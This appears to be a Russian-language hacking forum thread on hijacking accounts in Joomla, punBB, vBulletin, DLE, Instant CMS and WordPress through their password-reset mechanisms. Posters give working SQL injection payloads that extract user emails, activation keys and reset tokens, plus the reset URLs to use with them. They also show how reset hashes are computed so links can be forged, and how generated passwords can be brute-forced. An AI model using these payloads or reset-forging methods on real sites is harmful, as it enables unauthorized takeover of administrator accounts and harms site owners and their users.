ну раз с WP раскрылась тема то и до джумлы доберутся) вообщем в таблице юзеров есть такая колонка "activation" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "521608068f705c84e225b8bc30e387d6:$1$e47b7a03$" на почту пришел такой хешь "985255f8d4bbe03c95ec3b144fc43da8" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить! форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confirm
Короче походу все мои исследования, что я по ретриву проводил пора выкидывать в мусорку... Дальше так и пойдёт....
продолжу тему раз уж нато пошло форум punBB 1.3.4 PHP: select+substr(concat_ws(0x3a,id,username,email),1,99)+from+forum_users+limit+1,1 получаем идём на страницу востановления пароля PHP: http://сайт.ру/forum/login.php?action=forget вводим емеил, далее PHP: select+substr(concat_ws(0x3a,id,activate_key),1,99)+from+forum_users+limit+1,1 получам далее меняем пароль
Не торопитесь, ребят, скоро в ветке Уязвимости выложу весь свой труд по этому направлению - там всё и будет...
переносите тему в ветку уязвимости. BigBear'у теперь некогда этим заниматься, а тема не должна затеряться.
Способ так-же подходит для VB - при восстановлении устанавливается новый 8-ми символьный цифровой пароль, который сбрутить не составит труда, хэши в ссылке на восстановление не используются. Потом хэш можно вернуть на изначальный, только вот письмо из почты админа никуда не денется, хотя возможно в других двигах есть свои нюансы.
Версию не уточнял! DLE: 1) http://site/?do=lostpassword (via email) 2) use bug: http://site/script.php?video=-49674'+union+select+1,2,lostid,4,5,6,7+from+dle_lostdb+where+lostname='1'--+ В данном случае, lostname - это ID пользователя - обычно админ 3)переход по линку: http://site/index.php?do=lostpassword&action=password&douser=1&lostid=a05e0f74df705f0a1e3ab0803f82a7fd046214d5 4) Генерится 11 символьный пароль из loweralpha и digit. Причем, есть шанс, что сгенеренный пароль будет only 11 digit's P.S Лично у меня 11 lenght DIGIT simblols EGB обходит перебором за пару минут. Instant CMS v1.9 CСсылка формируется согласно шаблону: Query - SELECT *, DATE_FORMAT(logdate, '%d-%m-%Y-%H-%i-%s') as logdate FROM cms_users WHERE email = 'email' LIMIT 1 Непосредственно вычисление хеша: $usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate']); В результате прямой линк на сброс пароля принимает вид: http://site/registration/remind/bbd4da8d02433a6bdea3d3019458f951 Далее в форме вводим новый пароль:подтверждение. P.S. В stable что лежит на офф сайте код в алгоритм формирования ссылки в конец добавляется константа PATH ( $_SERVER['DOCUMENT_ROOT']) Like this: $usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate'].PATH);
WP 3.9.1 и выше (может и ниже) - ключ активации хешируется. 20 символов [a-zA-Z0-9] - проще хеш админа подобрать...